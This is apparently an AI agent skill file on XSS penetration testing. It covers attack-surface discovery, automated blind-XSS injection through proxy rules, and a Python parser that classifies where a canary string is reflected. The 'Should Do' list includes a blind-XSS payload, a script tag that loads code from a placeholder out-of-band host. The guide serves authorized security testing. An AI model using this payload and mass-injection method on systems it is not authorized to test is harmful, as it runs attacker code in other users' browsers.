pentest-xss
Cross-Site Scripting (XSS) Assessment
XSS stands for Cross-Site Scripting. "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end-user." (OWASP)
Activation Triggers (Positive)
xss, cross-site scripting, blind xss, reflected xss, stored xss, dom xss, polyglot payload, csp bypass, waf bypass
Exclusion Triggers (Negative)
sql injection, rce, network scan, report writing only
Instructions
- Discover Attack Surface: Identify all user-controllable input vectors, including URL parameters, headers (User-Agent, Referer, X-Forwarded-For), cookies, and request bodies (JSON, XML).
- Contextual Analysis: Determine where the input is reflected (HTML tag, attribute, JavaScript block, etc.) and what encoding/filtering is applied.
- Automated Hunting: Use "Match and Replace" rules in proxy tools to inject payloads into every request header and parameter to catch edge-case reflections and blind XSS.
- Blind XSS Delivery: Deploy OOB (Out-of-Band) interactions using a dedicated listener (e.g., Interact.sh) to detect delayed executions in internal or administrative panels.
- DOM Source-to-Sink Mapping: Audit client-side scripts for hazardous sinks (e.g., innerHTML, document.write) coupled with controllable sources (e.g., location.hash).
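A small context classifier for the Contextual Analysis step, added here as an example (it is not part of the original skill): it parses a captured response and reports in which HTML context a canary string lands (text node, attribute value, script or style body, comment) and whether a probe containing metacharacters came back raw or HTML-encoded. The response bodies and the zqx7 canary are constructed sample data, not from a real target.

```python
import html
from html.parser import HTMLParser

# Elements that never get a closing tag; they must not stay on the ancestor stack.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "source", "track", "wbr"}


class ReflectionLocator(HTMLParser):
    """Record the context (text/attribute/script/style/comment) and enclosing tag
    of every place a canary string is reflected in an HTML response."""

    def __init__(self, canary):
        super().__init__(convert_charrefs=False)
        self.canary = canary
        self.hits = []      # (context, enclosing_tag, attribute_name)
        self._stack = []    # currently open ancestor tags

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is not None and self.canary in value:
                self.hits.append(("attribute", tag, name))
        if tag not in VOID_TAGS:
            self._stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self._stack:  # pop through the innermost matching open tag
            idx = len(self._stack) - 1 - self._stack[::-1].index(tag)
            del self._stack[idx:]

    def handle_data(self, data):
        if self.canary not in data:
            return
        parent = self._stack[-1] if self._stack else None
        # script/style bodies are raw text to the parser but a JS/CSS context to an attacker
        context = parent if parent in ("script", "style") else "text"
        self.hits.append((context, parent, None))

    def handle_comment(self, data):
        if self.canary in data:
            self.hits.append(("comment", None, None))


def locate_reflections(response_body, canary):
    parser = ReflectionLocator(canary)
    parser.feed(response_body)
    parser.close()
    return parser.hits


def reflected_encoding(response_body, probe):
    """Report whether a metacharacter probe is reflected verbatim or HTML-entity encoded."""
    return {"raw": probe in response_body,
            "html_encoded": html.escape(probe, quote=True) in response_body}


# Constructed responses for a hypothetical /search?q=... request (not a real application).
SAMPLE = ('<html><body><form><input name="q" value="zqx7"></form>'
          '<p>Results for zqx7</p><script>var q = "zqx7";</script>'
          '<!-- debug: q=zqx7 --></body></html>')
ENCODED_SAMPLE = '<html><body><p>Results for &lt;zqx7&gt;</p></body></html>'

if __name__ == "__main__":
    for hit in locate_reflections(SAMPLE, "zqx7"):
        print(hit)
    print(reflected_encoding(ENCODED_SAMPLE, "<zqx7>"))
```

Each hit names the context to record in the finding (for example, attribute value of an input tag versus a script body), which decides which encoding the application must apply there.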
Tip 1: Hunting for Blind XSS with Match and Replace Rules
Automatically inject blind XSS payloads while browsing your targets, so you discover vulnerabilities more efficiently. To find blind XSS vulnerabilities while browsing, set up a match-and-replace rule in your proxy interceptor (such as Burp Suite) that auto-sends your blind XSS payload in each request.
The delayed execution, invisible injection point, and the requirement of a dedicated server that handles incoming invocations make it difficult to find and exploit blind XSS vulnerabilities. However, these XSS types are more critical by nature, which makes them worth testing for.
Should Do
- Use unique, traceable identifiers in payloads (e.g., <script src="//[unique_id].oob.server"></script>).
- Prioritize testing headers that are likely to be stored and viewed by administrators (e.g., User-Agent).
- Document the exact context of the vulnerability (e.g., "Reflected in attribute value within a form tag").
Should Not Do
- Do not assume that WAF presence means XSS is impossible; test for bypasses and encoding variations.
- Do not use disruptive payloads in production environments (e.g., those that redirect users or steal real session tokens).
- Do not stop testing after finding one XSS; check for multiple instances and types across the application.